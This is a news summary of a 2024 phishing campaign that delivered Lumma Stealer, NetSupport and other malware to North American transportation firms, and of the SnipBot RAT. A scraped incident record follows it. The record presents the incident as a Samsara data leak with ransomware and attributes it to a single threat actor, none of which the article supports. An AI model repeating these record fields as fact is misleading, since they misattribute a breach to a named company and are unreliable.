Samsara: Transportation Companies Hit by Cyberattacks Using Lumma Stealer and NetSupport Malware

New Phishing Campaign Targets North American Transportation and Logistics Firms

A sophisticated phishing campaign is targeting transportation and logistics companies across North America, delivering information stealers and remote access trojans (RATs) via compromised legitimate email accounts. Security firm Proofpoint identified the activity, which leveraged at least 15 breached accounts from shipping and transportation firms between May and August 2024.

The campaign initially distributed Lumma Stealer, StealC, and NetSupport but shifted tactics in August, introducing new infrastructure and payloads DanaBot and Arechclient2. Attackers used internet shortcut (.URL) attachments or Google Drive links leading to malicious files, which exploited Server Message Block (SMB) to fetch malware from remote servers. Some August variants employed ClickFix, a technique tricking victims into executing a Base64-encoded PowerShell script under the guise of fixing browser document display issues.

The phishing lures impersonated industry-specific software, including Samsara, AMB Logistic, and Astra TMS, suggesting attackers conducted prior research on targeted companies. The shift in payloads and techniques indicates an evolving threat landscape.

Separately, researchers at Palo Alto Networks Unit 42 uncovered a new version of RomCom RAT (SnipBot), a successor to PEAPOD (RomCom 4.0), distributed via phishing emails with malicious PDFs or disguised executables. SnipBot, previously linked to the Tropical Scorpius (Void Rabisu) threat group, now includes 27 commands, enabling file manipulation, process enumeration, SOCKS proxy setup, and data exfiltration. While past RomCom infections involved ransomware, recent activity suggests a potential pivot toward espionage rather than financial motives.

The campaigns highlight the growing sophistication of cyber threats targeting critical supply chain sectors.

Source: https://thehackernews.com/2024/09/transportation-companies-hit-by.html

Samsara cybersecurity rating report: https://www.rankiteo.com/company/samsara

"id": "SAM1780527307",
"linkid": "samsara",
"type": "Cyber Attack",
"date": "5/2024",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"

{'affected_entities': [{'industry': 'transportation and logistics',
                        'location': 'North America',
                        'type': 'transportation and logistics companies'}],
 'attack_vector': ['compromised email accounts',
                   'malicious attachments',
                   'Google Drive links',
                   'malicious PDFs',
                   'disguised executables'],
 'data_breach': {'data_encryption': True,
                 'data_exfiltration': True,
                 'personally_identifiable_information': True,
                 'sensitivity_of_data': 'high',
                 'type_of_data_compromised': ['personally identifiable '
                                              'information',
                                              'sensitive business data']},
 'date_detected': '2024-05-01',
 'date_publicly_disclosed': '2024-08-01',
 'description': 'A sophisticated phishing campaign is targeting transportation '
                'and logistics companies across North America, delivering '
                'information stealers and remote access trojans (RATs) via '
                'compromised legitimate email accounts. The campaign initially '
                'distributed Lumma Stealer, StealC, and NetSupport but shifted '
                'tactics in August, introducing new infrastructure and '
                'payloads DanaBot and Arechclient2. Attackers used internet '
                'shortcut (.URL) attachments or Google Drive links leading to '
                'malicious files, which exploited Server Message Block (SMB) '
                'to fetch malware from remote servers. Some August variants '
                'employed ClickFix, a technique tricking victims into '
                'executing a Base64-encoded PowerShell script under the guise '
                'of fixing browser document display issues. The phishing lures '
                'impersonated industry-specific software, including Samsara, '
                'AMB Logistic, and Astra TMS. Separately, researchers '
                'uncovered a new version of RomCom RAT (SnipBot), distributed '
                'via phishing emails with malicious PDFs or disguised '
                'executables, now including 27 commands for file manipulation, '
                'process enumeration, SOCKS proxy setup, and data '
                'exfiltration.',
 'impact': {'data_compromised': True, 'identity_theft_risk': True},
 'initial_access_broker': {'entry_point': ['compromised email accounts',
                                           'phishing emails']},
 'investigation_status': 'ongoing',
 'motivation': ['espionage', 'financial'],
 'post_incident_analysis': {'root_causes': ['phishing',
                                            'exploitation of SMB',
                                            'malicious attachments']},
 'ransomware': {'data_encryption': True, 'data_exfiltration': True},
 'references': [{'source': 'Proofpoint'},
                {'source': 'Palo Alto Networks Unit 42'}],
 'response': {'third_party_assistance': ['Proofpoint',
                                         'Palo Alto Networks Unit 42']},
 'threat_actor': ['Tropical Scorpius (Void Rabisu)'],
 'title': 'New Phishing Campaign Targets North American Transportation and '
          'Logistics Firms',
 'type': ['phishing', 'malware'],
 'vulnerability_exploited': ['Server Message Block (SMB)',
                             'ClickFix technique']}